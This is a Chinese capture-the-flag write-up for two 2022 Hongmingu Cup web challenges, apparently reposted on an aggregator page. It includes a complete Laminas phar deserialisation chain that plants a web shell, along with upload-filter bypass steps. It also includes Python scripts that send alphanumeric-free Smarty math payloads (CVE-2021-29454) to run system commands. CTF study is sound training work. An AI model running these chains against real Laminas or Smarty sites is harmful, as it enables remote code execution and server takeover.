锐客网

  1. 首页 > it技术 > >

2022红明谷杯web

ctf

Fan website 题目给了提示,和laminas有关。
2022红明谷杯web
文章图片

扫描目录得到源码。
审计代码发现题目有个album路由,并且控制器只有一个/module/Album/src/Controller/AlbumController.php
里面包含几个处理函数,可以上传文件,删除文件。
但是上传文件过滤是白名单所以不是很好绕过。
2022红明谷杯web
文章图片

并且内容里面不能有 HALT_COMPILER
2022红明谷杯web
文章图片

这就有点此地无银三百两了,无缘无故为啥过滤和phar有关的HALT_COMPILER。
上网搜这个组件的漏洞发现了一个反序列化漏洞https://xz.aliyun.com/t/8975,那就好说了,我们可以上传一个phar文件,然后删除文件调用unlink时触发反序列化。但是还得保证内容大于3kb,所以在序列化时加了个str_repeat('123',1000000)

"system"]; } } namespace Laminas\View\Renderer{ class PhpRenderer{ private $__helpers; function __construct(){ $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver(); } } }namespace Laminas\Log\Writer{ abstract class AbstractWriter{} class Mail extends AbstractWriter{ protected $eventsToMail = ["echo '' > /var/www/public/a.php"]; //cmdcmd cmd protected $subjectPrependText = null; protected $mail; function __construct(){ $this->mail = new \Laminas\View\Renderer\PhpRenderer(); } } }namespace Laminas\Log{ class Logger{ protected $writers; function __construct(){ $this->writers = [new \Laminas\Log\Writer\Mail()]; } } }namespace{ $a = new \Laminas\Log\Logger(); $phar = new Phar("shell.phar"); //后缀名必须为 phar $phar->startBuffering(); $phar -> setStub('GIF89a'.''); $phar->setMetadata($a); //将自定义的 meta-data 存入 manifest $phar->addFromString("a", str_repeat('123',1000000)); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); } ?>

链子出来了还有个问题需要解决。绕过 网上找到篇文章https://www.wangan.com/p/7fygf7a00f0fd793

可以把生成的phar文件gzip压缩。然后将后缀改成png。
上传完成后拿到文件路径。
2022红明谷杯web
文章图片

文件删除处传入phar:///var/www/public/img/00bf23e130fa1e525e332ff03dae345d.png
2022红明谷杯web
文章图片

蚁剑连接后得到flag
2022红明谷杯web
文章图片

Smarty_calculator 扫描后台拿到源码
题目名字就是本题的考点了,php中的smarty模板。
经过搜索发现了和这个相关的cve CVE-2021-29454,是利用smarty中的math
学习一波之后就是可以通过传入{math equation="(( x + y ) / z )" x=2 y=10 z=2}进行计算。
【2022红明谷杯web】并且源码中存在相关的文件src/Smarty/plugins/function.math.php
在里面发现了eval函数
2022红明谷杯web
文章图片

那题目考查的应该就是命令执行漏洞了,往上翻,equation里面的内容不能有反引号和$并且左右括号个数要匹配。除此之外,还会进行一个正则匹配。
2022红明谷杯web
文章图片

大概就是不能存在16进制,不能有字母开头的,否则的话,进入这个foreach循环。
在往下还是一个循环,如果传入的内容中使用的字符串不是equation或者format或者assign就会进行一个替换。
所以我们如果避免这两个循环就可以将传入的内容拼接后放入eval中。
我们很容易想到无数字字母rce。这样就被不会被正则表达式匹配到,也可以绕过另外一个循环(没有其他字母,$param中就只有equation一个键值)。
无数字字母的脚本我之前写了一个比较全的。https://blog.csdn.net/miuzzx/article/details/109143413直接拿自己脚本用了。
采用或运算构造,先来试下phpinfo
2022红明谷杯web
文章图片

import requests import urllib.parse url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"data=https://www.it610.com/article/{'data':urllib.parse.unquote(''' {math equation="1; ('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')(); //" }''')}r=requests.post(url,data=https://www.it610.com/article/data,cookies={'login':'1'}) print(r.text)

2022红明谷杯web
文章图片

存在df,但是留了个popen,所以可以用popen执行系统命令。
盲猜一波flag路径为/flag,执行系统命令cp /flag a
也就是构造php语句popen('cp /f* a','r')
2022红明谷杯web
文章图片

import requests import urllib.parse url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"data=https://www.it610.com/article/{'data':urllib.parse.unquote(''' {math equation="1; ('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40')); //" }''')}r=requests.post(url,data=https://www.it610.com/article/data,cookies={'login':'1'}) print(r.text)

访问/a得到flag
2022红明谷杯web
文章图片

    推荐阅读


    上一篇:java|亚马逊跨境电商平台怎么入驻()

    下一篇:ctfshow|CTFSHOW大赛原题篇(web756-web770)